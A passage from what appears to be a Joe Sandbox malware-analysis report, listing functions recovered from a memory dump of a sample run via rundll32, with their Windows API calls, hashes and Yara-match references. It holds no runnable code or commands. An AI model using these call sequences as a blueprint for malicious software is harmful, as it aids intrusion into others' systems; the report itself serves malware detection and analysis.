                                                          • lstrlen.KERNEL32(00000000,76CC81D0,?,76C85520,773BEEF0,?,00000000,0627E842,00000000,0689C310), ref: 0628EA40
                                                          • lstrlen.KERNEL32(?,?,00000000,0627E842,00000000,0689C310), ref: 0628EA48
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • strcpy.NTDLL ref: 0628EA5F
                                                          • lstrcat.KERNEL32(00000000,?), ref: 0628EA6A
                                                            • Part of subcall function 0628C32E: lstrlen.KERNEL32(?,?,?,00000000,?,0628EA79,00000000,?,?,00000000,0627E842,00000000,0689C310), ref: 0628C33F
                                                            • Part of subcall function 0628E803: RtlFreeHeap.NTDLL(00000000,?,06283953,?,?,0628BF5B,00000000,00000000,062710B0,00000000,06299F2C,00000008,00000003), ref: 0628E80F
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,00000000,0627E842,00000000,0689C310), ref: 0628EA87
                                                            • Part of subcall function 0627930C: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,0628EA93,00000000,?,00000000,0627E842,00000000,0689C310), ref: 06279316
                                                            • Part of subcall function 0627930C: _snprintf.NTDLL ref: 06279374
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 505cb68394faffbf8adde110fe3b6998fc5b1157634ccb8303186d6ec93368ca
                                                          • Instruction ID: 4348a97e65846da34b81128d0b220af652d1d6f9083a8cf2a79f48fdeae315ef
                                                          • Opcode Fuzzy Hash: 505cb68394faffbf8adde110fe3b6998fc5b1157634ccb8303186d6ec93368ca
                                                          • Instruction Fuzzy Hash: BF117333E226257F4B92BBA9AC88CAE37AD9FC99643060115FD14A7180DE74C902D7F1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06279E82 Relevance: 10.6, APIs: 7, Instructions: 67threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SwitchToThread.KERNEL32(?,?,0628E846), ref: 06279EAD
                                                          • CloseHandle.KERNEL32(?,?,0628E846), ref: 06279EB9
                                                          • CloseHandle.KERNEL32(00000000,76CDF720,?,06273576,00000000,?,?,?,0628E846), ref: 06279ECB
                                                          • memset.NTDLL ref: 06279EE2
                                                          • memset.NTDLL ref: 06279EF9
                                                          • memset.NTDLL ref: 06279F10
                                                          • memset.NTDLL ref: 06279F27
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memset$CloseHandle$SwitchThread
                                                          • String ID:
                                                          • API String ID: 3699883640-0
                                                          • Opcode ID: 4da6c481f3f1495692c81c986db8220d35715fae9bf33c2b1c0aff85ceaecee2
                                                          • Instruction ID: 848b18232e782210e1ac8c1b557daf28dc5549bbbf7ce02fe89393ab47e36e8b
                                                          • Opcode Fuzzy Hash: 4da6c481f3f1495692c81c986db8220d35715fae9bf33c2b1c0aff85ceaecee2
                                                          • Instruction Fuzzy Hash: A3119131D627616BD6923726BC4CD4F7AAFAFD6B00B080016FE05A6590CA7A4A40CAB5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627CA7A Relevance: 10.6, APIs: 7, Instructions: 62memorysynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0627CAAB
                                                          • wcstombs.NTDLL ref: 0627CABC
                                                            • Part of subcall function 06274963: StrChrA.SHLWAPI(?,0000002E,00000000,?,?,00000000,062770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 06274975
                                                            • Part of subcall function 06274963: StrChrA.SHLWAPI(?,00000020,?,00000000,062770EB,00000000,?,00000000,?,?,?,?,?,?), ref: 06274984
                                                          • OpenProcess.KERNEL32(00000001,00000000,?,00000000), ref: 0627CADD
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 0627CAEC
                                                          • CloseHandle.KERNEL32(00000000), ref: 0627CAF3
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0627CB02
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 0627CB12
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HeapProcess$AllocateCloseFreeHandleObjectOpenSingleTerminateWaitwcstombs
                                                          • String ID:
                                                          • API String ID: 417118235-0
                                                          • Opcode ID: c063dadb8cf9af6ccb0db22811114c8db3a2ecf0a18391064c809ee46abae061
                                                          • Instruction ID: 74d6fd37f9c344ebdcbd0a55964fb2883d6cf262c3d90d870c1a1e0658cb8b50
                                                          • Opcode Fuzzy Hash: c063dadb8cf9af6ccb0db22811114c8db3a2ecf0a18391064c809ee46abae061
                                                          • Instruction Fuzzy Hash: AD118B31600316BFE7529F64EC4DFAA7BAAFF48356F144010FA05A6180C7B1A994DBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06283193 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 0628509E
                                                            • Part of subcall function 0628508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850B7
                                                            • Part of subcall function 0628508C: GetCurrentThreadId.KERNEL32 ref: 062850C4
                                                            • Part of subcall function 0628508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850D0
                                                            • Part of subcall function 0628508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,06275112,00000000,?,00000000,00000000,?), ref: 062850DE
                                                            • Part of subcall function 0628508C: lstrcpy.KERNEL32(00000000), ref: 06285100
                                                          • lstrcpy.KERNEL32(-000000FC,00000000), ref: 062831CD
                                                          • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,062913E7,?,?,00000000,?,06280E77,00000000), ref: 062831DF
                                                          • GetTickCount.KERNEL32 ref: 062831EA
                                                          • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,062913E7,?,?,00000000,?,06280E77,00000000), ref: 062831F6
                                                          • lstrcpy.KERNEL32(00000000), ref: 06283210
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
                                                          • String ID: \Low
                                                          • API String ID: 1629304206-4112222293
                                                          • Opcode ID: 70bc0fa714b870be9af180bc7c7985be220bebb6d74d6bc77444c48b71ac099b
                                                          • Instruction ID: be34a164efcc9db8c787402e4e679fb952e5661a3b171aeefe990452850c4655
                                                          • Opcode Fuzzy Hash: 70bc0fa714b870be9af180bc7c7985be220bebb6d74d6bc77444c48b71ac099b
                                                          • Instruction Fuzzy Hash: 310196316127156FD751B6B9AC4CF6F779DAF89A55B050024FA00E71C0CB28D901CBF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06276F51 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45timeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • wsprintfA.USER32 ref: 06276F64
                                                          • CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 06276F76
                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 06276FA0
                                                          • WaitForMultipleObjects.KERNEL32(00000002,06282EB3,00000000,000000FF), ref: 06276FB3
                                                          • CloseHandle.KERNEL32(06282EB3), ref: 06276FBC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
                                                          • String ID: 0x%08X
                                                          • API String ID: 603522830-3182613153
                                                          • Opcode ID: 5f20932278ebeb8d19968baa90504b6da2f7b1994af4e72e20985d2670a8f5a9
                                                          • Instruction ID: bbc8af3dcc3718c0118abd4785dd07cb256a60f5c5175b23cdf3cff7c81b719c
                                                          • Opcode Fuzzy Hash: 5f20932278ebeb8d19968baa90504b6da2f7b1994af4e72e20985d2670a8f5a9
                                                          • Instruction Fuzzy Hash: 8E014C71A01229BBCB009F90EC4DDEEBF7DEF46264B004118AA16A2185D7709601CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628D30A Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • GetLastError.KERNEL32(?,?,?,00001000,?,0629A2F4,76CDF750), ref: 0628D38B
                                                          • WaitForSingleObject.KERNEL32(00000000,00000000,?,0629A2F4,76CDF750), ref: 0628D410
                                                          • CloseHandle.KERNEL32(00000000,?,0629A2F4,76CDF750), ref: 0628D42A
                                                          • OpenProcess.KERNEL32(00100000,00000000,00000000,?,0629A2F4,76CDF750), ref: 0628D45F
                                                            • Part of subcall function 0627D6B0: RtlReAllocateHeap.NTDLL(00000000,?,?,06275546), ref: 0627D6C0
                                                          • WaitForSingleObject.KERNEL32(?,00000064,?,0629A2F4,76CDF750), ref: 0628D4E1
                                                          • CloseHandle.KERNEL32(F0FFC983,?,0629A2F4,76CDF750), ref: 0628D508
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
                                                          • String ID:
                                                          • API String ID: 3115907006-0
                                                          • Opcode ID: 9197a3cc035b038d1898ff6e182db3e9f6eb816b9be878e1bae04843a820648f
                                                          • Instruction ID: 15bd6359e74b586007ed87ea9ee87294401990541794d7cb2ecd76159a43b803
                                                          • Opcode Fuzzy Hash: 9197a3cc035b038d1898ff6e182db3e9f6eb816b9be878e1bae04843a820648f
                                                          • Instruction Fuzzy Hash: F2813871D1121AEFDB51EF94C884AADBBB5FF48305F248859ED05AB290C770AD44CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628B278 Relevance: 9.2, APIs: 6, Instructions: 200timestringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • FileTimeToLocalFileTime.KERNEL32(00000000,06282702), ref: 0628B2DA
                                                          • FileTimeToSystemTime.KERNEL32(06282702,?), ref: 0628B2E8
                                                          • lstrlenW.KERNEL32(00000010), ref: 0628B2F8
                                                          • lstrlenW.KERNEL32(00000218), ref: 0628B304
                                                          • FileTimeToLocalFileTime.KERNEL32(00000008,06282702), ref: 0628B3F1
                                                          • FileTimeToSystemTime.KERNEL32(06282702,?), ref: 0628B3FF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Time$File$LocalSystemlstrlen$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1122361434-0
                                                          • Opcode ID: 2dcfd7f7ad963a69b1b5aa78f9c5e39c2da95e762e1eb9614d0b07442d4ca331
                                                          • Instruction ID: c6c86c614e60ef932b015c6c13cd965d309fbaa6128cb24e3e7a300c9cb4b978
                                                          • Opcode Fuzzy Hash: 2dcfd7f7ad963a69b1b5aa78f9c5e39c2da95e762e1eb9614d0b07442d4ca331
                                                          • Instruction Fuzzy Hash: 80711C71A1021AAFCB50DBA9DC84EEEB7FDBF48305F04446AEA15E7240E734DA45DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627E40F Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlImageNtHeader.NTDLL(?), ref: 0627E428
                                                            • Part of subcall function 06287A3E: lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,0627E448,?), ref: 06287A6A
                                                            • Part of subcall function 06287A3E: RtlAllocateHeap.NTDLL(00000000,?), ref: 06287A7C
                                                            • Part of subcall function 06287A3E: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0627E448,?), ref: 06287A99
                                                            • Part of subcall function 06287A3E: lstrlenW.KERNEL32(00000000,?,?,0627E448,?), ref: 06287AA5
                                                            • Part of subcall function 06287A3E: HeapFree.KERNEL32(00000000,00000000,?,?,0627E448,?), ref: 06287AB9
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 0627E460
                                                          • CloseHandle.KERNEL32(?), ref: 0627E46E
                                                          • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 0627E547
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0627E556
                                                          • HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 0627E569
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
                                                          • String ID:
                                                          • API String ID: 1719504581-0
                                                          • Opcode ID: f7780dbff53146e56132aa27de311d68bc444bd9922b1143acd40cd68d86236c
                                                          • Instruction ID: 677e413cda8ea5fb6a58b5a7c9b74af22f8845ecec7f47d00425a659ef3a4f59
                                                          • Opcode Fuzzy Hash: f7780dbff53146e56132aa27de311d68bc444bd9922b1143acd40cd68d86236c
                                                          • Instruction Fuzzy Hash: EC41A531A1030AAFDB619FA4EC49E9A7B7AEF84704F054065EE44A7250E730DA55DBB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628D1DC Relevance: 9.1, APIs: 6, Instructions: 122threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,?), ref: 0628D237
                                                          • GetLastError.KERNEL32 ref: 0628D25D
                                                          • SetEvent.KERNEL32(00000000), ref: 0628D270
                                                          • GetModuleHandleA.KERNEL32(00000000), ref: 0628D2B9
                                                          • memset.NTDLL ref: 0628D2CE
                                                          • RtlExitUserThread.NTDLL(?), ref: 0628D303
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$ErrorEventExitLastThreadUsermemset
                                                          • String ID:
                                                          • API String ID: 3978817377-0
                                                          • Opcode ID: 5c9e803ca5370a88e69190ab2173177c0595c4312d188c8b802565b35658fee5
                                                          • Instruction ID: 04fc6953f0e181cfc638eace1e1eca842f06d20664db8bbe3ec25cd5ab95e774
                                                          • Opcode Fuzzy Hash: 5c9e803ca5370a88e69190ab2173177c0595c4312d188c8b802565b35658fee5
                                                          • Instruction Fuzzy Hash: 03416D70D11604AFCB61AFA8DC88CAEB7B9FF892117644919FD06E2585D734E948CF60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 06284F40 Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 724edd8b1b55212726ce8b031848c6f9bcec77d3187415b3129e88ba31329195
                                                          • Instruction ID: 04de5a9e5c7f03fe34e2986b224a5ec85ca2099e1bf34319af5e1c4ba4c6f48e
                                                          • Opcode Fuzzy Hash: 724edd8b1b55212726ce8b031848c6f9bcec77d3187415b3129e88ba31329195
                                                          • Instruction Fuzzy Hash: 01412571921712DFD7A0BF349C8891B77E9FF88329B044A2DEAAAD61C0D7709440CFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627EABA Relevance: 9.1, APIs: 6, Instructions: 108stringsynchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0627AE7C: lstrlen.KERNEL32(0627E448,00000000,00000000,?,?,06287A5B,?,?,?,?,0627E448,?), ref: 0627AE8B
                                                            • Part of subcall function 0627AE7C: mbstowcs.NTDLL ref: 0627AEA7
                                                          • lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0627EB0D
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0628BB1D
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0628BB29
                                                            • Part of subcall function 0628BAD1: memset.NTDLL ref: 0628BB71
                                                            • Part of subcall function 0628BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0628BB8C
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(0000002C), ref: 0628BBC4
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?), ref: 0628BBCC
                                                            • Part of subcall function 0628BAD1: memset.NTDLL ref: 0628BBEF
                                                            • Part of subcall function 0628BAD1: wcscpy.NTDLL ref: 0628BC01
                                                          • PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0627EB2E
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0627EB5A
                                                            • Part of subcall function 0628BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0628BC27
                                                            • Part of subcall function 0628BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 0628BC5D
                                                            • Part of subcall function 0628BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 0628BC79
                                                            • Part of subcall function 0628BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0628BC92
                                                            • Part of subcall function 0628BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0628BCA4
                                                            • Part of subcall function 0628BAD1: FindClose.KERNEL32(?), ref: 0628BCB9
                                                            • Part of subcall function 0628BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0628BCCD
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(0000002C), ref: 0628BCEF
                                                          • LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0627EB77
                                                          • WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 0627EB98
                                                          • PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 0627EBAD
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
                                                          • String ID:
                                                          • API String ID: 2670873185-0
                                                          • Opcode ID: 60f8b492c4d3c1555392e59ebe8480bbccb9b14b42dd790311eee27dc1a0b573
                                                          • Instruction ID: 680c940b306b00b7038b3e3c0cb5788826a0b59ed6119e0d584f53e7c5129b6c
                                                          • Opcode Fuzzy Hash: 60f8b492c4d3c1555392e59ebe8480bbccb9b14b42dd790311eee27dc1a0b573
                                                          • Instruction Fuzzy Hash: B1315E729183069FCB50AF64DC88C2EBBEAFBC8354F15096DF99593120D730E905CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0628EF9F Relevance: 9.1, APIs: 6, Instructions: 93memorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000104,06293A4E,00000000,?,?,06289BAD,?,00000005,?,00000000), ref: 0628EFBB
                                                          • lstrlen.KERNEL32(00000000,00000104,06293A4E,00000000,?,?,06289BAD,?,00000005), ref: 0628EFD1
                                                          • lstrlen.KERNEL32(?,00000104,06293A4E,00000000,?,?,06289BAD,?,00000005), ref: 0628EFE6
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0628F04B
                                                          • _snprintf.NTDLL ref: 0628F071
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000012,00000001,00000000), ref: 0628F090
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFree_snprintf
                                                          • String ID:
                                                          • API String ID: 3180502281-0
                                                          • Opcode ID: d0c67d369776130f9cf34ab36abcc0b5db2270b35394188da4994dfdd1bdb421
                                                          • Instruction ID: 995413c2bf12fd695080c40e8a16eedccda103d1b64b34fa739b0b349f3c1163
                                                          • Opcode Fuzzy Hash: d0c67d369776130f9cf34ab36abcc0b5db2270b35394188da4994dfdd1bdb421
                                                          • Instruction Fuzzy Hash: C1314F32A21219FFDF51EF65EC448AE7BAAFB84245B018425FD04AB150D2719D10DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627A976 Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0627A990
                                                          • CreateWaitableTimerA.KERNEL32(0629A1E8,00000001,?), ref: 0627A9AD
                                                          • GetLastError.KERNEL32(?,00000000,06288C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0627A9BE
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F02
                                                            • Part of subcall function 06291ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 06291F16
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F30
                                                            • Part of subcall function 06291ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,06272C89,?,?,?), ref: 06291F5A
                                                          • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627A9FE
                                                          • SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627AA1D
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,06288C06,00000000,00000000,0000801C), ref: 0627AA33
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
                                                          • String ID:
                                                          • API String ID: 1835239314-0
                                                          • Opcode ID: f51005ca42d1e4c9cee488d0a7dce4d09662834ee9cc294d0cc6782c5913c122
                                                          • Instruction ID: eb210bfc34e839ae7591ce5737c1e631d9926f297146770d99092bd7e3b270ae
                                                          • Opcode Fuzzy Hash: f51005ca42d1e4c9cee488d0a7dce4d09662834ee9cc294d0cc6782c5913c122
                                                          • Instruction Fuzzy Hash: FC312B71D20209EBCF61DF99D98DCAFBBB9EBC9361B208015F905A6140D3309A44CFB2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0627F519 Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • StrChrA.SHLWAPI(?,00000020,00000000,?,00000000,?,?,?,06287C35,00000000,?,?,?), ref: 0627F531
                                                          • StrChrA.SHLWAPI(00000001,00000020,?,?,?,06287C35,00000000,?,?,?), ref: 0627F542
                                                            • Part of subcall function 06271F0F: lstrlen.KERNEL32(?,?,00000000,00000000,?,06283D4E,00000000,?,?,00000000,00000001), ref: 06271F21
                                                            • Part of subcall function 06271F0F: StrChrA.SHLWAPI(?,0000000D,?,06283D4E,00000000,?,?,00000000,00000001), ref: 06271F59
                                                          • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0627F582
                                                          • memcpy.NTDLL(00000000,?,00000007,?,?,?,06287C35,00000000), ref: 0627F5AF
                                                          • memcpy.NTDLL(00000000,?,?,00000000,?,00000007,?,?,?,06287C35,00000000), ref: 0627F5BE
                                                          • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007,?,?,?,06287C35,00000000), ref: 0627F5D0
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: memcpy$AllocateHeaplstrlen
                                                          • String ID:
                                                          • API String ID: 1819133394-0
                                                          • Opcode ID: e27fbd1cf4f117773ed4445ac1c76781f67c5521bc4198edbea9a08c80c77931
                                                          • Instruction ID: a1174a0426f6ce9d71edde0efb2d6dedd9ad2cc43488744acf9eaecd081e05d6
                                                          • Opcode Fuzzy Hash: e27fbd1cf4f117773ed4445ac1c76781f67c5521bc4198edbea9a08c80c77931
                                                          • Instruction Fuzzy Hash: FE21717290020ABFDB519F99EC84F9ABBEDEF49654F048051FE08DB151DA70E944CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0629049A Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 062904D9
                                                          • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 062904EA
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 06290505
                                                          • GetLastError.KERNEL32 ref: 0629051B
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0629052D
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06290542
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
                                                          • String ID:
                                                          • API String ID: 1822509305-0
                                                          • Opcode ID: 478d4c33caa34fe5bba75419ca8dce99a4472612dd3f1f270282510fec178a87
                                                          • Instruction ID: 612d0843cac8d0348670d0e0430330be78f6dc93069993560bf653ae475a0453
                                                          • Opcode Fuzzy Hash: 478d4c33caa34fe5bba75419ca8dce99a4472612dd3f1f270282510fec178a87
